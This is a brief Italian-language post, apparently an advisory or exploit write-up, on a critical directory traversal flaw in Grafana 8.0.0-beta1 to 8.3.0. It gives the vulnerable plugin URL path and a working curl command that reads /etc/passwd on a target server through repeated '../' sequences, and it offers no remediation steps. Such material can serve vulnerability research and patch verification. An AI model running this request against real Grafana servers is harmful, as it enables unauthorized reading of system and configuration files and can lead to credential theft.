
Di PrivacyHunter
Versioni interessate: da Grafana 8.0.0-beta1 a 8.3.0 (escluse le versioni con patch)
Tipo di vulnerabilità: Directory Traversal (attraversamento di directory)
Livello di impatto: Critico
Piattaforma: Grafana (piattaforma open-source di monitoraggio e osservabilità)
⚠️ Dettagli della vulnerabilità In Grafana è possibile eseguire un attraversamento di directory tramite il seguente URL:
Codice http://<grafana_host>/public/plugins// Attraverso questo, un attaccante può leggere file locali sul server. Ad esempio, accesso non autorizzato a /etc/passwd o file di configurazione.
🔥 Esempio di sfruttamento Lettura di un file tramite una semplice richiesta:
bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd Tramite la richiesta sopra è possibile ottenere l'elenco degli utenti del sistema Linux.